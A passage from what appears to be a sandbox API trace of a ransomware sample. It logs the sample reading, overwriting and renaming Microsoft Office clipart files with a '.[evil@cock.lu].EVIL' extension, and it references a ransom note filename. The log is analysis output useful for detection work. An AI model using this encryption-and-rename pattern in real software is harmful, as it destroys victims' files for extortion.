dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.388] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1364, lpOverlapped=0x0) returned 1 [0138.410] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.410] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.410] _errno () returned 0x84b1160840 [0138.410] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.410] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1380, lpOverlapped=0x0) returned 1 [0138.410] CloseHandle (hObject=0x1a8) returned 1 [0138.411] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.411] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.411] __uncaught_exception () returned 0x84b1160800 [0138.411] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.411] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105378.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105378.wmf.[evil@cock.lu].evil")) returned 1 [0138.412] ??_V@YAXPEAX@Z () returned 0x1 [0138.415] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105378.WMF", dwFileAttributes=0x200) returned 0 [0138.415] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.415] wcsstr (_Str="J0105380.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.415] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF") returned 69 [0138.415] wcscmp (_String1="J0105380.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.415] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105380.WMF") returned 0x0 [0138.415] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF") returned 0x45 [0138.415] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105380.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.417] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1210, lpOverlapped=0x0) returned 1 [0138.467] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.467] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.467] _errno () returned 0x84b1160840 [0138.467] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.467] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1220, lpOverlapped=0x0) returned 1 [0138.467] CloseHandle (hObject=0x1a8) returned 1 [0138.468] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.468] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.468] __uncaught_exception () returned 0x84b1160800 [0138.468] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.468] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105380.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105380.wmf.[evil@cock.lu].evil")) returned 1 [0138.469] ??_V@YAXPEAX@Z () returned 0x1 [0138.472] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105380.WMF", dwFileAttributes=0x200) returned 0 [0138.472] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.472] wcsstr (_Str="J0105384.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.472] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF") returned 69 [0138.472] wcscmp (_String1="J0105384.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.472] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105384.WMF") returned 0x0 [0138.472] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF") returned 0x45 [0138.472] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105384.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.474] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16f8, lpOverlapped=0x0) returned 1 [0138.491] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.491] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.491] _errno () returned 0x84b1160840 [0138.492] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.492] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x1700, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1700, lpOverlapped=0x0) returned 1 [0138.492] CloseHandle (hObject=0x1a8) returned 1 [0138.492] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.492] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.492] __uncaught_exception () returned 0x84b1160800 [0138.492] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.493] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105384.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105384.wmf.[evil@cock.lu].evil")) returned 1 [0138.493] ??_V@YAXPEAX@Z () returned 0x1 [0138.497] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105384.WMF", dwFileAttributes=0x200) returned 0 [0138.497] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.497] wcsstr (_Str="J0105386.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.497] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF") returned 69 [0138.497] wcscmp (_String1="J0105386.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.497] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105386.WMF") returned 0x0 [0138.497] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF") returned 0x45 [0138.497] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105386.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.499] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x175c, lpOverlapped=0x0) returned 1 [0138.503] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.503] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.503] _errno () returned 0x84b1160840 [0138.503] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.503] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1760, lpOverlapped=0x0) returned 1 [0138.503] CloseHandle (hObject=0x1a8) returned 1 [0138.503] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.503] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.503] __uncaught_exception () returned 0x84b1160800 [0138.503] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.504] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105386.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105386.wmf.[evil@cock.lu].evil")) returned 1 [0138.504] ??_V@YAXPEAX@Z () returned 0x1 [0138.507] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105386.WMF", dwFileAttributes=0x200) returned 0 [0138.507] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.507] wcsstr (_Str="J0105388.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.507] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF") returned 69 [0138.507] wcscmp (_String1="J0105388.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.507] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105388.WMF") returned 0x0 [0138.507] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF") returned 0x45 [0138.507] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105388.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.509] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x203c, lpOverlapped=0x0) returned 1 [0138.530] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.530] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.530] _errno () returned 0x84b1160840 [0138.530] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.530] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2040, lpOverlapped=0x0) returned 1 [0138.530] CloseHandle (hObject=0x1a8) returned 1 [0138.531] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.531] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.531] __uncaught_exception () returned 0x84b1160800 [0138.531] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.531] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105388.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105388.wmf.[evil@cock.lu].evil")) returned 1 [0138.532] ??_V@YAXPEAX@Z () returned 0x1 [0138.534] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105388.WMF", dwFileAttributes=0x200) returned 0 [0138.535] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.535] wcsstr (_Str="J0105390.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.535] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF") returned 69 [0138.535] wcscmp (_String1="J0105390.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.535] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105390.WMF") returned 0x0 [0138.535] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF") returned 0x45 [0138.535] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105390.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.537] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1350, lpOverlapped=0x0) returned 1 [0138.578] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.578] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.578] _errno () returned 0x84b1160840 [0138.578] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.578] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1360, lpOverlapped=0x0) returned 1 [0138.578] CloseHandle (hObject=0x1a8) returned 1 [0138.578] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.578] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.578] __uncaught_exception () returned 0x84b1160800 [0138.579] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.579] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105390.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105390.wmf.[evil@cock.lu].evil")) returned 1 [0138.579] ??_V@YAXPEAX@Z () returned 0x1 [0138.582] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105390.WMF", dwFileAttributes=0x200) returned 0 [0138.582] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.582] wcsstr (_Str="J0105396.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.582] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF") returned 69 [0138.582] wcscmp (_String1="J0105396.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.582] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105396.WMF") returned 0x0 [0138.582] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF") returned 0x45 [0138.582] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105396.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.584] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2b04, lpOverlapped=0x0) returned 1 [0138.614] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.614] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.614] _errno () returned 0x84b1160840 [0138.614] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.614] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x2b20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2b20, lpOverlapped=0x0) returned 1 [0138.614] CloseHandle (hObject=0x1a8) returned 1 [0138.614] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.615] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.615] __uncaught_exception () returned 0x84b1160800 [0138.615] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.615] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105396.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105396.wmf.[evil@cock.lu].evil")) returned 1 [0138.616] ??_V@YAXPEAX@Z () returned 0x1 [0138.618] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105396.WMF", dwFileAttributes=0x200) returned 0 [0138.618] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.618] wcsstr (_Str="J0105398.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.618] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF") returned 69 [0138.618] wcscmp (_String1="J0105398.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.618] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105398.WMF") returned 0x0 [0138.618] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF") returned 0x45 [0138.619] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105398.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.620] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xd00, lpOverlapped=0x0) returned 1 [0138.645] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.645] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.645] _errno () returned 0x84b1160840 [0138.645] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.645] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xd20, lpOverlapped=0x0) returned 1 [0138.645] CloseHandle (hObject=0x1a8) returned 1 [0138.645] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0138.645] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0138.645] __uncaught_exception () returned 0x84b1160800 [0138.645] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0138.645] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105398.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105398.wmf.[evil@cock.lu].evil")) returned 1 [0138.646] ??_V@YAXPEAX@Z () returned 0x1 [0138.649] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105398.WMF", dwFileAttributes=0x200) returned 0 [0138.649] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0138.649] wcsstr (_Str="J0105410.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0138.649] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF") returned 69 [0138.649] wcscmp (_String1="J0105410.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0138.649] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0105410.WMF") returned 0x0 [0138.649] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF") returned 0x45 [0138.649] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105410.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105410.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0138.651] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4fdc, lpOverlapped=0x0) returned 1 [0138.696] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.696] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0138.696] _errno () returned 0x84b1160840 [0138.696] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 